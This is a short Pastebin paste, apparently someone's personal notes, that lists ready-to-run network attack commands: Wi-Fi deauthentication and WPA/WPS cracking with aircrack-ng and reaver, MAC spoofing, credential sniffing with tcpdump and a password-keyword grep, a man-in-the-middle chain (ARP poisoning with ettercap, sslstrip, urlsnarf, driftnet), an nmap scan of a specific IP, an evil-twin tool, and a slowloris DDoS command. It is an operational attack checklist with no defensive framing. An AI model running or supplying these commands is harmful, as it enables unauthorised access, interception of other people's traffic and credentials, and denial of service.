Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ifconfig wlp1s0 up
- iwlist wlp1s0 scanning
- aireplay-ng -0 100 -a 56:DB:30:BD:27:C3 -c 60:AF:6D:17:66:DC mon0
- airodump-ng mon2 --bssid 56:DB:30:BD:27:C3 --channel 6 --write pswd
- aircrack-ng pswd-01.cap -w wordlist.txt
- ifconfig eth0 down
- ifconfig enp2s0f5 hw ether f0:4d:a2:e6:20:db
- ifconfig eth0 up
- tcpdump -i wlp1s0 port 53
- tcpdump -i wlp1s0 port smtp or port imap or port pop3 or port http or port 80 or port 8080 or port 3128 or port 10000 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '
- -> MAC SOARES = F0:7D:68:E6:9C:EE
- -> CABO = enp2s0f5
- -> WI-FI = wlp1s0
- Attack Password Reaver
- ifconfig
- airmon-ng start wlp1s0
- kill 565 575 606 674 675 955
- wash -i mon0
- reaver -i mon2 -b 56:DB:30:BD:27:C3 -vv
- Attack MITM
- echo "1" > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- sslstrip -a -l 10000
- *
- ettercap -T -q -i wlp1s0 -M arp:remote ////
- *
- urlsnarf -i wlp1s0
- *
- driftnet -i wlp1s0
- nmap -O 187.109.92.72 ver IP
- cd /home/ariel/bck && ./linset
- Attack DDoS
- cd /home/ariel/bck/ && perl slowloris.pl -dns SITE.COM -port 80 -timeout 1 -num 1000 -tcpto 5
- Abrir NetBixa
- cd /usr/local/netbeans-8.1/bin && sh netbeans
- http://iplogger.com/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement